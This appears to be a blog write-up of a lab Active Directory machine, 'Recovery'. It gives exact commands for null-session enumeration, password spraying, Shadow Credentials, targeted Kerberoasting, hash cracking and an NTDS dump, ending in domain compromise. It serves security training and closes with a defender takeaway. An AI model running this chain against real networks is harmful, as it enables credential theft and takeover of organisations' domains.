<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="Recovery - Complete Penetration Testing WalkthroughIntroductionThis is a complete walkthrough and writeup for the Recovery machine from the Ronin66 lab. Recovery is a Domain Controller running in a do">
<meta property="og:type" content="article">
<meta property="og:title" content="Ronin66-Recovery">
<meta property="og:url" content="https://panosoikogr.github.io/2026/09/17/Ronin66-Recovery/index.html">
<meta property="og:site_name" content="Panosoiko Cybersecurity Blog">
<meta property="og:description" content="Recovery - Complete Penetration Testing WalkthroughIntroductionThis is a complete walkthrough and writeup for the Recovery machine from the Ronin66 lab. Recovery is a Domain Controller running in a do">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://panosoikogr.github.io/images/Recovery/foot-hold-pass.png">
<meta property="og:image" content="https://panosoikogr.github.io/images/Recovery/user-worked-pass.png">
<meta property="og:image" content="https://panosoikogr.github.io/images/Recovery/add-key-cred-link.png">
<meta property="og:image" content="https://panosoikogr.github.io/images/Recovery/shadowcreds.png">
<meta property="og:image" content="https://panosoikogr.github.io/images/Recovery/machine.png">
<meta property="og:image" content="https://panosoikogr.github.io/images/Recovery/mount.png">
<meta property="og:image" content="https://panosoikogr.github.io/images/Recovery/valid-password.png">
<meta property="article:published_time" content="2026-09-17T20:21:33.000Z">
<meta property="article:modified_time" content="2026-09-17T20:22:07.259Z">
<meta property="article:author" content="Panosoiko">
<meta property="article:tag" content="ActiveDirectory">
<meta property="article:tag" content="Ronin66">
<meta property="article:tag" content="Windows">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://panosoikogr.github.io/images/Recovery/foot-hold-pass.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/android-chrome-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>Ronin66-Recovery</title>
    <!-- async scripts -->
    <!-- Google Analytics -->

  <script async src="https://www.googletagmanager.com/gtag/js?id=G-73BMC8ZHB7"></script>
  <script>
      window.dataLayer = window.dataLayer || [];
      function gtag(){dataLayer.push(arguments);}
      gtag('js', new Date());
      gtag('config', 'G-73BMC8ZHB7');
  </script>


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 8.0.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writeups</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     --><!--
       --><li><a href="/tags/">tags</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/PanosoikoGr">Projects</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        
        <li><a class="icon" aria-label="Next post" href="/2026/09/17/Ronin66-Judge/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://panosoikogr.github.io/2026/09/17/Ronin66-Recovery/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://panosoikogr.github.io/2026/09/17/Ronin66-Recovery/&text=Ronin66-Recovery"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://panosoikogr.github.io/2026/09/17/Ronin66-Recovery/&title=Ronin66-Recovery"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://panosoikogr.github.io/2026/09/17/Ronin66-Recovery/&is_video=false&description=Ronin66-Recovery"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Ronin66-Recovery&body=Check out this article: https://panosoikogr.github.io/2026/09/17/Ronin66-Recovery/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://panosoikogr.github.io/2026/09/17/Ronin66-Recovery/&title=Ronin66-Recovery"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://panosoikogr.github.io/2026/09/17/Ronin66-Recovery/&title=Ronin66-Recovery"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://panosoikogr.github.io/2026/09/17/Ronin66-Recovery/&title=Ronin66-Recovery"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://panosoikogr.github.io/2026/09/17/Ronin66-Recovery/&title=Ronin66-Recovery"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://panosoikogr.github.io/2026/09/17/Ronin66-Recovery/&name=Ronin66-Recovery&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://panosoikogr.github.io/2026/09/17/Ronin66-Recovery/&t=Ronin66-Recovery"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Recovery-Complete-Penetration-Testing-Walkthrough"><span class="toc-number">1.</span> <span class="toc-text">Recovery - Complete Penetration Testing Walkthrough</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Introduction"><span class="toc-number">1.1.</span> <span class="toc-text">Introduction</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Initial-Enumeration"><span class="toc-number">1.2.</span> <span class="toc-text">Initial Enumeration</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#NULL-Authentication-%E2%80%94-User-Enumeration"><span class="toc-number">1.2.1.</span> <span class="toc-text">NULL Authentication — User Enumeration</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#BloodHound-Enumeration"><span class="toc-number">1.3.</span> <span class="toc-text">BloodHound Enumeration</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Shadow-Credentials-%E2%80%94-j-ortega-%E2%86%92-s-connery"><span class="toc-number">1.4.</span> <span class="toc-text">Shadow Credentials — j.ortega → s.connery</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Abusing-AddKeyCredentialLink"><span class="toc-number">1.4.1.</span> <span class="toc-text">Abusing AddKeyCredentialLink</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#WinRM-as-s-connery"><span class="toc-number">1.4.2.</span> <span class="toc-text">WinRM as s.connery</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Credential-Hunting-%E2%80%94-mount-exe"><span class="toc-number">1.5.</span> <span class="toc-text">Credential Hunting — mount.exe</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Certificate-Enumeration"><span class="toc-number">1.5.1.</span> <span class="toc-text">Certificate Enumeration</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Targeted-Kerberoasting-%E2%80%94-s-johansson-%E2%86%92-w-dafoe"><span class="toc-number">1.6.</span> <span class="toc-text">Targeted Kerberoasting — s.johansson → w.dafoe</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#WriteSPN-Abuse"><span class="toc-number">1.6.1.</span> <span class="toc-text">WriteSPN Abuse</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Cracking-the-Hash"><span class="toc-number">1.6.2.</span> <span class="toc-text">Cracking the Hash</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Shadow-Credentials-%E2%80%94-w-dafoe-%E2%86%92-DC01-%E2%86%92-NTDS"><span class="toc-number">1.7.</span> <span class="toc-text">Shadow Credentials — w.dafoe → DC01$ → NTDS</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#GenericAll-Over-the-DC-Machine-Account"><span class="toc-number">1.7.1.</span> <span class="toc-text">GenericAll Over the DC Machine Account</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Dumping-NTDS"><span class="toc-number">1.7.2.</span> <span class="toc-text">Dumping NTDS</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Conclusion"><span class="toc-number">1.8.</span> <span class="toc-text">Conclusion</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Tools-Used"><span class="toc-number">1.9.</span> <span class="toc-text">Tools Used</span></a></li></ol></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        Ronin66-Recovery
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">Panosoiko</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2026-09-17T20:21:33.000Z" class="dt-published" itemprop="datePublished">2026-09-17</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/ActiveDirectory/" rel="tag">ActiveDirectory</a>, <a class="p-category" href="/tags/Ronin66/" rel="tag">Ronin66</a>, <a class="p-category" href="/tags/Windows/" rel="tag">Windows</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <h1 id="Recovery-Complete-Penetration-Testing-Walkthrough"><a href="#Recovery-Complete-Penetration-Testing-Walkthrough" class="headerlink" title="Recovery - Complete Penetration Testing Walkthrough"></a>Recovery - Complete Penetration Testing Walkthrough</h1><h2 id="Introduction"><a href="#Introduction" class="headerlink" title="Introduction"></a>Introduction</h2><p>This is a complete walkthrough and writeup for the <strong>Recovery</strong> machine from the Ronin66 lab. Recovery is a Domain Controller running in a domain where NULL authentication is allowed, which gives us our initial foothold. From there we chain together Shadow Credentials, a credential hiding in a binary on disk, targeted Kerberoasting, and a final Shadow Credentials attack against the machine account itself to dump NTDS and walk away with the Administrator hash.</p>
<p><strong>Tools Used:</strong> NetExec, BloodHound, certipy, Evil-WinRM, strings, targetedKerberoast.py, hashcat</p>
<p><strong>Difficulty:</strong> Medium</p>
<p><strong>Key Techniques:</strong> NULL auth user enumeration, password spray, Shadow Credentials (AddKeyCredentialLink), credential extraction from binary (strings), WriteSPN targeted Kerberoasting, GenericAll → machine account Shadow Credentials, NTDS dump</p>
<p><strong>Environment:</strong></p>
<ul>
<li>Domain: <code>recovery.local</code></li>
<li>DC: <code>DC01</code></li>
<li>DC IP: <code>172.16.18.19</code></li>
</ul>
<hr>
<h2 id="Initial-Enumeration"><a href="#Initial-Enumeration" class="headerlink" title="Initial Enumeration"></a>Initial Enumeration</h2><h3 id="NULL-Authentication-—-User-Enumeration"><a href="#NULL-Authentication-—-User-Enumeration" class="headerlink" title="NULL Authentication — User Enumeration"></a>NULL Authentication — User Enumeration</h3><p>We begin by checking whether the DC allows unauthenticated SMB enumeration — and it does. A null-session user listing reveals a user with their password sitting in their account description:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">netexec smb 172.16.18.19 -u &#x27;&#x27; -p &#x27;&#x27; --users</span><br></pre></td></tr></table></figure>

<p><img src="/images/Recovery/foot-hold-pass.png" alt="foot-hold-pass"></p>
<p>We grab the exposed password and the full user list, then spray it across every account:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">netexec smb 172.16.18.19 -u users.txt -p &#x27;&lt;REDACTED&gt;&#x27;</span><br></pre></td></tr></table></figure>

<p><img src="/images/Recovery/user-worked-pass.png" alt="user-worked-pass"></p>
<p>The password works for <strong>j.ortega</strong>. We also note that <code>MachineAccountQuota</code> is set to <strong>50</strong>, meaning any domain user can create machine accounts — a useful primitive to keep in mind.</p>
<hr>
<h2 id="BloodHound-Enumeration"><a href="#BloodHound-Enumeration" class="headerlink" title="BloodHound Enumeration"></a>BloodHound Enumeration</h2><p>With valid credentials we collect BloodHound data over LDAP:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">netexec ldap 172.16.18.19 -u j.ortega -p &#x27;&lt;REDACTED&gt;&#x27; --bloodhound --dns-server 172.16.18.19 -c all --dns-tcp</span><br></pre></td></tr></table></figure>

<p>We load the zip into BloodHound and trace outbound edges from <code>j.ortega</code>. The account holds <strong>AddKeyCredentialLink</strong> over <code>s.connery</code>.</p>
<p><img src="/images/Recovery/add-key-cred-link.png" alt="add-key-cred-link"></p>
<hr>
<h2 id="Shadow-Credentials-—-j-ortega-→-s-connery"><a href="#Shadow-Credentials-—-j-ortega-→-s-connery" class="headerlink" title="Shadow Credentials — j.ortega → s.connery"></a>Shadow Credentials — j.ortega → s.connery</h2><h3 id="Abusing-AddKeyCredentialLink"><a href="#Abusing-AddKeyCredentialLink" class="headerlink" title="Abusing AddKeyCredentialLink"></a>Abusing AddKeyCredentialLink</h3><p><code>AddKeyCredentialLink</code> allows us to write a certificate-based credential (a Key Credential) to <code>s.connery</code>‘s <code>msDS-KeyCredentialLink</code> attribute. <strong>certipy</strong> automates the full flow — it writes the key, requests a TGT using PKINIT, and retrieves the NTLM hash:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">certipy shadow auto -u j.ortega@recovery.local -p &#x27;&lt;REDACTED&gt;&#x27; -account s.connery</span><br></pre></td></tr></table></figure>

<blockquote>
<p><strong>Note:</strong> If the TGT request fails with a clock skew error, sync time with the DC first:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo ntpdate 172.16.18.19</span><br></pre></td></tr></table></figure></blockquote>
<p><img src="/images/Recovery/shadowcreds.png" alt="shadowcreds"></p>
<p>We now have <code>s.connery</code>‘s NTLM hash.</p>
<h3 id="WinRM-as-s-connery"><a href="#WinRM-as-s-connery" class="headerlink" title="WinRM as s.connery"></a>WinRM as s.connery</h3><p><code>s.connery</code> is a member of the Remote Management Users (Remote Desktop) group, so we can log straight in:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">evil-winrm -i 172.16.18.19 -u s.connery -H &#x27;&lt;REDACTED&gt;&#x27;</span><br></pre></td></tr></table></figure>

<hr>
<h2 id="Credential-Hunting-—-mount-exe"><a href="#Credential-Hunting-—-mount-exe" class="headerlink" title="Credential Hunting — mount.exe"></a>Credential Hunting — mount.exe</h2><h3 id="Certificate-Enumeration"><a href="#Certificate-Enumeration" class="headerlink" title="Certificate Enumeration"></a>Certificate Enumeration</h3><p>While on the box, we run a certificate enumeration to check for ADCS misconfigurations:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">certipy find -u s.connery -hashes &#x27;&lt;REDACTED&gt;&#x27; -dc-ip 172.16.18.19 -stdout</span><br></pre></td></tr></table></figure>

<p><img src="/images/Recovery/machine.png" alt="machine"></p>
<p>The certificate path is noted as a potential avenue, but something more direct is available. Exploring the <code>C:\</code> drive we find a <code>utils</code> folder containing a <code>mount.exe</code> binary. We carve strings out of it:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">strings mount.exe</span><br></pre></td></tr></table></figure>

<p><img src="/images/Recovery/mount.png" alt="mount"></p>
<p>A plaintext credential for <strong>s.johansson</strong> is embedded in the binary. We spray it to confirm it’s valid:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">netexec smb 172.16.18.19 -u users.txt -p &#x27;&lt;REDACTED&gt;&#x27;</span><br></pre></td></tr></table></figure>

<p><img src="/images/Recovery/valid-password.png" alt="valid-password"></p>
<p>Confirmed — <code>s.johansson</code> authenticates successfully.</p>
<hr>
<h2 id="Targeted-Kerberoasting-—-s-johansson-→-w-dafoe"><a href="#Targeted-Kerberoasting-—-s-johansson-→-w-dafoe" class="headerlink" title="Targeted Kerberoasting — s.johansson → w.dafoe"></a>Targeted Kerberoasting — s.johansson → w.dafoe</h2><h3 id="WriteSPN-Abuse"><a href="#WriteSPN-Abuse" class="headerlink" title="WriteSPN Abuse"></a>WriteSPN Abuse</h3><p>Back in BloodHound, <code>s.johansson</code> holds <strong>WriteSPN</strong> over <code>w.dafoe</code>. WriteSPN lets us set an arbitrary SPN on a user account, which makes it eligible for Kerberoasting — even if it had none before. We use <strong>targetedKerberoast</strong> to do both steps in one shot:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">python3 targetedKerberoast.py --request-user w.dafoe -d recovery.local \</span><br><span class="line">  -u s.johansson -p &#x27;&lt;REDACTED&gt;&#x27; --dc-ip 172.16.18.19 -o Hash.txt</span><br></pre></td></tr></table></figure>

<h3 id="Cracking-the-Hash"><a href="#Cracking-the-Hash" class="headerlink" title="Cracking the Hash"></a>Cracking the Hash</h3><p>We crack the resulting TGS hash with hashcat and rockyou:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">hashcat Hash.txt /usr/share/wordlists/rockyou.txt</span><br></pre></td></tr></table></figure>

<p>The password for <code>w.dafoe</code> cracks successfully.</p>
<hr>
<h2 id="Shadow-Credentials-—-w-dafoe-→-DC01-→-NTDS"><a href="#Shadow-Credentials-—-w-dafoe-→-DC01-→-NTDS" class="headerlink" title="Shadow Credentials — w.dafoe → DC01$ → NTDS"></a>Shadow Credentials — w.dafoe → DC01$ → NTDS</h2><h3 id="GenericAll-Over-the-DC-Machine-Account"><a href="#GenericAll-Over-the-DC-Machine-Account" class="headerlink" title="GenericAll Over the DC Machine Account"></a>GenericAll Over the DC Machine Account</h3><p>BloodHound shows that <code>w.dafoe</code> holds <strong>GenericAll</strong> over the <code>DC01$</code> machine account. GenericAll on a machine account includes <code>AddKeyCredentialLink</code>, so we run the Shadow Credentials attack again — this time targeting the DC itself:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">certipy shadow auto -u w.dafoe@recovery.local -p &#x27;&lt;REDACTED&gt;&#x27; -account DC01$</span><br></pre></td></tr></table></figure>

<p>We retrieve the NTLM hash for <code>DC01$</code>.</p>
<h3 id="Dumping-NTDS"><a href="#Dumping-NTDS" class="headerlink" title="Dumping NTDS"></a>Dumping NTDS</h3><p>With the DC machine account hash, we perform a DCSync-style NTDS dump via NetExec:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">netexec smb 172.16.18.19 -u &#x27;DC01$&#x27; -H &#x27;&lt;REDACTED&gt;&#x27; --ntds</span><br></pre></td></tr></table></figure>

<p>The dump returns every domain account hash including <strong>Administrator</strong>. We use it to log in over WinRM and grab the root flag:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">evil-winrm -i 172.16.18.19 -u Administrator -H &#x27;&lt;REDACTED&gt;&#x27;</span><br></pre></td></tr></table></figure>

<p>The domain is fully compromised.</p>
<hr>
<h2 id="Conclusion"><a href="#Conclusion" class="headerlink" title="Conclusion"></a>Conclusion</h2><p>Recovery was a well-structured ACL chain that kept things moving from one account to the next without gaps:</p>
<ol>
<li><strong>NULL auth</strong> — a password in a user description handed us the initial foothold</li>
<li><strong>AddKeyCredentialLink</strong> — Shadow Credentials on <code>s.connery</code> via <code>j.ortega</code>, giving us a WinRM shell</li>
<li><strong>Binary credential hunting</strong> — <code>strings mount.exe</code> recovered <code>s.johansson</code>‘s password from disk</li>
<li><strong>WriteSPN → Kerberoasting</strong> — <code>s.johansson</code> let us Kerberoast <code>w.dafoe</code> on demand</li>
<li><strong>GenericAll on DC01$</strong> — Shadow Credentials against the machine account → NTDS dump → game over</li>
</ol>
<p>The key takeaway: a single misconfiguration at the start (NULL auth + password in description) cascades into full domain compromise when ACL edges aren’t audited. BloodHound makes these chains obvious — defenders should be running it too.</p>
<h2 id="Tools-Used"><a href="#Tools-Used" class="headerlink" title="Tools Used"></a>Tools Used</h2><ul>
<li>NetExec</li>
<li>BloodHound</li>
<li>certipy</li>
<li>Evil-WinRM</li>
<li>strings</li>
<li>targetedKerberoast.py</li>
<li>hashcat</li>
</ul>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/archives/">Writeups</a></li>
        
          <li><a href="/search/">Search</a></li>
        
          <li><a href="/tags/">tags</a></li>
        
          <li><a target="_blank" rel="noopener" href="https://github.com/PanosoikoGr">Projects</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Recovery-Complete-Penetration-Testing-Walkthrough"><span class="toc-number">1.</span> <span class="toc-text">Recovery - Complete Penetration Testing Walkthrough</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Introduction"><span class="toc-number">1.1.</span> <span class="toc-text">Introduction</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Initial-Enumeration"><span class="toc-number">1.2.</span> <span class="toc-text">Initial Enumeration</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#NULL-Authentication-%E2%80%94-User-Enumeration"><span class="toc-number">1.2.1.</span> <span class="toc-text">NULL Authentication — User Enumeration</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#BloodHound-Enumeration"><span class="toc-number">1.3.</span> <span class="toc-text">BloodHound Enumeration</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Shadow-Credentials-%E2%80%94-j-ortega-%E2%86%92-s-connery"><span class="toc-number">1.4.</span> <span class="toc-text">Shadow Credentials — j.ortega → s.connery</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Abusing-AddKeyCredentialLink"><span class="toc-number">1.4.1.</span> <span class="toc-text">Abusing AddKeyCredentialLink</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#WinRM-as-s-connery"><span class="toc-number">1.4.2.</span> <span class="toc-text">WinRM as s.connery</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Credential-Hunting-%E2%80%94-mount-exe"><span class="toc-number">1.5.</span> <span class="toc-text">Credential Hunting — mount.exe</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#Certificate-Enumeration"><span class="toc-number">1.5.1.</span> <span class="toc-text">Certificate Enumeration</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Targeted-Kerberoasting-%E2%80%94-s-johansson-%E2%86%92-w-dafoe"><span class="toc-number">1.6.</span> <span class="toc-text">Targeted Kerberoasting — s.johansson → w.dafoe</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#WriteSPN-Abuse"><span class="toc-number">1.6.1.</span> <span class="toc-text">WriteSPN Abuse</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Cracking-the-Hash"><span class="toc-number">1.6.2.</span> <span class="toc-text">Cracking the Hash</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Shadow-Credentials-%E2%80%94-w-dafoe-%E2%86%92-DC01-%E2%86%92-NTDS"><span class="toc-number">1.7.</span> <span class="toc-text">Shadow Credentials — w.dafoe → DC01$ → NTDS</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#GenericAll-Over-the-DC-Machine-Account"><span class="toc-number">1.7.1.</span> <span class="toc-text">GenericAll Over the DC Machine Account</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Dumping-NTDS"><span class="toc-number">1.7.2.</span> <span class="toc-text">Dumping NTDS</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Conclusion"><span class="toc-number">1.8.</span> <span class="toc-text">Conclusion</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Tools-Used"><span class="toc-number">1.9.</span> <span class="toc-text">Tools Used</span></a></li></ol></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://panosoikogr.github.io/2026/09/17/Ronin66-Recovery/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://panosoikogr.github.io/2026/09/17/Ronin66-Recovery/&text=Ronin66-Recovery"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://panosoikogr.github.io/2026/09/17/Ronin66-Recovery/&title=Ronin66-Recovery"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://panosoikogr.github.io/2026/09/17/Ronin66-Recovery/&is_video=false&description=Ronin66-Recovery"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Ronin66-Recovery&body=Check out this article: https://panosoikogr.github.io/2026/09/17/Ronin66-Recovery/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://panosoikogr.github.io/2026/09/17/Ronin66-Recovery/&title=Ronin66-Recovery"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://panosoikogr.github.io/2026/09/17/Ronin66-Recovery/&title=Ronin66-Recovery"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://panosoikogr.github.io/2026/09/17/Ronin66-Recovery/&title=Ronin66-Recovery"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://panosoikogr.github.io/2026/09/17/Ronin66-Recovery/&title=Ronin66-Recovery"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://panosoikogr.github.io/2026/09/17/Ronin66-Recovery/&name=Ronin66-Recovery&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://panosoikogr.github.io/2026/09/17/Ronin66-Recovery/&t=Ronin66-Recovery"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
